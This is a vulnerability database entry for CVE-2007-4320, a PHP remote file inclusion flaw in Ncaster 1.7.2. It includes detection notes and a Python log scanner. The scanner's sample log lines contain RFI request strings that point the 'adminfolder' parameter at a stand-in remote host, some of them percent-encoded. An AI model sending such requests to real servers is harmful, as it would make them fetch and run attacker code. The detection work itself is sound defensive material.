CVE-2007-4320
published 2007-08-14


Priority: P258 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 72.02% (99.4th percentile)
PHP remote file inclusion vulnerability in admin/addons/archive/archive.php in Ncaster 1.7.2 allows remote attackers to execute arbitrary PHP code via a URL in the adminfolder parameter.

Affected

1 range
Vendor | Product | Version range | Fixed in
ncaster | ncaster | |

Detection & IOCs (extracted from sources)

path: admin/addons/archive/archive.php
  • Remote File Inclusion via the 'adminfolder' GET parameter in archive.php; monitor HTTP requests containing a URL (http/https) in the adminfolder parameter targeting admin/addons/archive/archive.php
  • The vulnerable code passes the adminfolder parameter directly into a require() call; look for require() of a remote URL pattern in PHP logs or WAF alerts on this endpoint
  • Exploitation requires PHP's allow_url_include (and allow_url_fopen) to be enabled on the target server; environments with these directives disabled are not exploitable via this RFI vector
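
One way to implement the request monitoring described above, as an added example that is not part of the original entry or of Ncaster. It assumes Apache/nginx combined-format access logs; the function names and the sample log lines are constructed for illustration. It matches any `scheme://` value rather than only http/https, and it undoes repeated percent-encoding before matching.

```python
import re
from urllib.parse import parse_qsl, unquote

TARGET_PATH = "admin/addons/archive/archive.php"   # path from the entry
PARAM = "adminfolder"                              # parameter from the entry
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so encoded URLs are still matched."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return the decoded adminfolder URL if the line matches, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not fully_decode(path).lower().endswith(TARGET_PATH):
        return None
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)
        if name == PARAM and SCHEME_RE.match(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, url) for every suspicious request in the log."""
    hits = []
    for line in lines:
        url = check_line(line)
        if url is not None:
            hits.append((line.split()[0], url))
    return hits

# Constructed sample lines (documentation IP range, .test hostnames).
P = "/ncaster/admin/addons/archive/archive.php"
SAMPLE_LOG = [
    f'192.0.2.10 - - [t] "GET {P}?adminfolder=http://files.example.test/inc HTTP/1.1" 200 512',
    f'192.0.2.11 - - [t] "GET {P}?adminfolder=https%3A%2F%2Ffiles.example.test%2Finc HTTP/1.1" 200 512',
    f'192.0.2.12 - - [t] "GET {P}?adminfolder=../../admin/ HTTP/1.1" 200 512',
    '192.0.2.13 - - [t] "GET /index.php?adminfolder=http://files.example.test/inc HTTP/1.1" 200 90',
    f'192.0.2.14 - - [t] "GET {P}?adminfolder=http%253A%252F%252Ffiles.example.test%252Finc HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, url in scan(SAMPLE_LOG):
        print(f"possible RFI attempt from {ip}: adminfolder={url}")
```

Only the query string is inspected, matching the GET parameter the entry describes.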